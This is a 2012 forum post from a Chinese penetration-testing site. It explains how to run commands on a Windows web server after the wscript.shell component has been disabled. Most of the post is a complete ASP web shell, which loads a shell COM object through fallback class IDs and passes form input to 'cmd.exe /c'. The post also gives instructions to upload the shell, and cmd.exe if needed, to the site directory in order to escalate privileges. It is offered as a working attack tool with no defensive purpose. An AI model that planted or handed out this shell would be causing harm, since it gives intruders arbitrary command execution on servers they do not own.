中国网络渗透测试联盟
标题:
wscript.shell删除解决办法
[打印本页]
作者:
admin
时间:
2012-9-15 14:36
标题:
wscript.shell删除解决办法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
2 q. Y% z8 l2 B8 h- C
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
2 p; ]& x1 @* s" a/ ^, |6 O O
要想让运行命令可以试试这种方法,成功率为五五之数。
, p, }* s5 R% g/ t( v4 H. u
把下面代码复制:
: o" v7 l" C6 R* t1 u
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
" l% M- y3 ?; M1 Q1 q
<%if err then%>
$ B0 T, X: |1 r0 Y4 p0 U
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
; [( N' b- u0 C: W3 I
<%
q* \' N- z& S* q
end if
1 K- m4 X, x' P, @, B
response.write("<textarea readonly cols=80 rows=20>")
1 n) S. j8 ?; [& `( o
On Error Resume Next
6 I. d9 q6 p7 x+ M" ~" e! J0 K
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
9 [7 b8 n! b* P) N' B* `: L5 V, [
response.write("</textarea>")
# U$ k8 n9 s6 N2 D
response.write("<form method='post'>")
2 B, v) z* I: @2 r& S
response.write("<input type=text name='c' size=60><br>")
" Q$ S! N0 p s2 q* x) C6 @! g$ D
response.write("<input type=submit value='执行'></form>")
- x/ K4 e' e: }4 L' {0 [
%>
: A) G% C# ^$ ^2 o( O+ [4 b
: R' W0 O& m+ d& ^
保存为一个asp文件,然后传到网站目录上去
. x( h$ `" n! t6 ~ u' b! ]" H
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
, { U6 s( q& |; E9 @3 x8 p/ C" B" |3 `
我用此成功运行过cacls命令。
7 g7 X5 I, z2 R7 x" X
: W% {9 e3 k) {: O7 o; Z1 v
第二那就是运行时出错,可能限制某些代码执行
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2